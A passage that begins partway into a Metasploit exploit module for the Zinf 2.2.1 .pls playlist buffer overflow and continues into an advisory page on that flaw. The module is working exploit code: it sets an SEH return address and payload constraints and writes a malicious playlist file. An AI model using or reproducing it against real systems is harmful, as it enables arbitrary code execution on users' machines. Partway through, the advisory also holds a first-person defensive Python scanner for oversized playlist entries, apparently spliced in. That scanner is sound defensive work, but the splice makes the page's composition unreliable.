					PLS file within a browser, when the PLS extention is registered to Zinf.
					This functionality has not been tested in this module.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'Trancek <trancek[at]yashira.org>', 'patrick' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-0964' ],
					[ 'OSVDB', '10416' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/7888' ],
					[ 'BID', '11248' ],
				],
			'Payload'        =>
				{
					'Space'    => 800,
					'BadChars' => "\x00\x0a\x0d\x3c\x22\x3e\x3d",
					'EncoderType'   => Msf::Encoder::Type::AlphanumMixed,
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        => 
				[
					# Tested by patrick - 20090429 xpsp3
					[ 'Zinf Universal 2.2.1', { 'Ret' => 0x1204f514 } ], #pop esi; pop ebx; ret - ./Plugins/zinf.ui
				],
			'Privileged'     => false,
			'DisclosureDate' => '24 Sep 2004',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME', [ true, 'The file name.',  'exploit_zinf.pls']),
				], self.class)

	end

	def exploit
		seh = generate_seh_payload(target.ret)
		filepls = rand_text_alpha_upper(1424) + seh

		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(filepls)

	end

end

    

- Vulnerability information

10416
Zinf Playlist Manager .pls File Overflow
Local / Remote, Context Dependent, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Upgrade
Exploit Public, Vendor Verified

- Vulnerability description

A buffer overflow exists in Zinf 2.2.1 and below. The Zinf player fails to check buffer lengths resulting in a stack overflow. With a specially crafted playlist file, a context-dependent attacker can execute arbitrary code.

- Timeline

2004-09-25 Unknown
2004-09-24 Unknown

- Solution

Upgrade to version 2.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

- Vulnerability information

Zinf Malformed Playlist File Remote Buffer Overflow Vulnerability
Boundary Condition Error 11248
Yes No
2004-09-24 12:00:00 2009-01-30 07:59:00
Discovery is credited to Luigi Auriemma <aluigi@autistici.org>.

- Affected program versions

Zinf Zinf 2.2.1
Debian Linux 3.0 sparc
Debian Linux 3.0 s/390
Debian Linux 3.0 ppc
Debian Linux 3.0 mipsel
Debian Linux 3.0 mips
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64
Debian Linux 3.0 ia-32
Debian Linux 3.0 hppa
Debian Linux 3.0 arm
Debian Linux 3.0 alpha

- Vulnerability discussion

Zinf is prone to a remote buffer-overflow vulnerability when processing malformed playlist files. This issue occurs because the application fails to perform sufficient boundary checks. An attacker may exploit this issue to gain unauthorized access to a vulnerable computer.

Zinf 2.2.1 for Windows is vulnerable.

NOTE: Zinf 2.2.5 for Linux is reportedly fixed, but this has not been confirmed.
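The two descriptions above (OSVDB: the player "fails to check buffer lengths"; BID: "fails to perform sufficient boundary checks" on playlist entries) come down to one property a defender can check for: a .pls entry value that is far longer than any path or URL. The following triage scanner is an added example, not code from the advisory, from Zinf or from any of the listed exploits; it walks a raw .pls file, flags values over a bounded-parser limit, non-printable bytes and a missing [playlist] header, and runs on constructed samples that copy only the shape of the PoCs (padding bytes, no payload). The 260-byte threshold, the names scan_pls/PlsReport and the sample playlists are my assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed threshold: a path or URL in a real playlist entry fits well within
# 260 bytes (Windows MAX_PATH), while the public PoCs for this bug use values of
# roughly 500 to 2000 bytes, so this cap separates the two with a wide margin.
MAX_VALUE_LEN = 260

# key=value lines, e.g. File1=..., Title1=..., NumberOfEntries=...
KEY_RE = re.compile(r"^([A-Za-z]+\d*)=(.*)$")


@dataclass
class Finding:
    line_no: int   # 0 means "whole file"
    key: str
    length: int
    reason: str


@dataclass
class PlsReport:
    has_header: bool = False
    entries: int = 0
    findings: List[Finding] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.findings)


def scan_pls(data: bytes, max_value_len: int = MAX_VALUE_LEN) -> PlsReport:
    """Walk a raw .pls file and record everything a bounded parser should reject."""
    report = PlsReport()
    # Work on bytes: a crafted file is not valid text, and decoding first would hide that.
    for line_no, raw in enumerate(data.split(b"\n"), start=1):
        line = raw.rstrip(b"\r")
        if not line:
            continue
        # Playlist lines are printable ASCII (plus tab); NOP sleds and shellcode are not.
        if any((b < 0x20 and b != 0x09) or b > 0x7E for b in line):
            report.findings.append(Finding(line_no, "-", len(line), "non-printable bytes"))
        text = line.decode("latin-1")   # lossless 1:1 byte mapping, never raises
        if text[:10].lower() == "[playlist]":
            report.has_header = True
            text = text[10:]             # PoC 559 glues File1= directly onto the header
            if not text:
                continue
        m = KEY_RE.match(text)
        if m is None:
            # No key at all: a bare sled/padding blob (PoC 7887 style) or junk.
            if len(line) > max_value_len:
                report.findings.append(
                    Finding(line_no, "-", len(line), "oversized line without key=value form"))
            continue
        key, value = m.group(1), m.group(2)
        report.entries += 1
        if len(value) > max_value_len:
            report.findings.append(
                Finding(line_no, key, len(value), "value exceeds %d bytes" % max_value_len))
    if not report.has_header:
        report.findings.append(Finding(0, "-", 0, "missing [playlist] header"))
    return report


# Constructed samples (no exploit content): a normal playlist and two shapes that
# copy the public PoCs using padding bytes only.
BENIGN_PLS = (b"[playlist]\r\nNumberOfEntries=1\r\n"
              b"File1=http://example.invalid/stream.mp3\r\nTitle1=Demo\r\n"
              b"Length1=-1\r\nVersion=2\r\n")
OVERSIZED_PLS = b"[playlist]File1=" + b"A" * 1500 + b"\x90" * 16   # header glued to a huge File1
HEADERLESS_BLOB = b"\x90" * 2000                                    # bare sled, no playlist syntax

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_PLS), ("oversized", OVERSIZED_PLS), ("blob", HEADERLESS_BLOB)):
        rep = scan_pls(blob)
        verdict = "SUSPICIOUS" if rep.suspicious else "ok"
        print(f"{name}: {verdict}, header={rep.has_header}, entries={rep.entries}")
        for f in rep.findings:
            print(f"  line {f.line_no} key={f.key} len={f.length}: {f.reason}")
```

Pointing the scanner at a directory of downloaded playlists before they reach a legacy player gives the same bound the fixed versions enforce internally.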

- Exploitation

The following exploits are available:

- Solution

Fixes are available. Please see the references for details.

Debian Linux 3.0 hppa
Debian Linux 3.0 ppc
Debian Linux 3.0 s/390
Debian Linux 3.0 arm
Debian Linux 3.0 alpha
Debian Linux 3.0 mips
Debian Linux 3.0 mipsel
Debian Linux 3.0 ia-32
Debian Linux 3.0 sparc
Debian Linux 3.0 m68k
Debian Linux 3.0 ia-64

- References
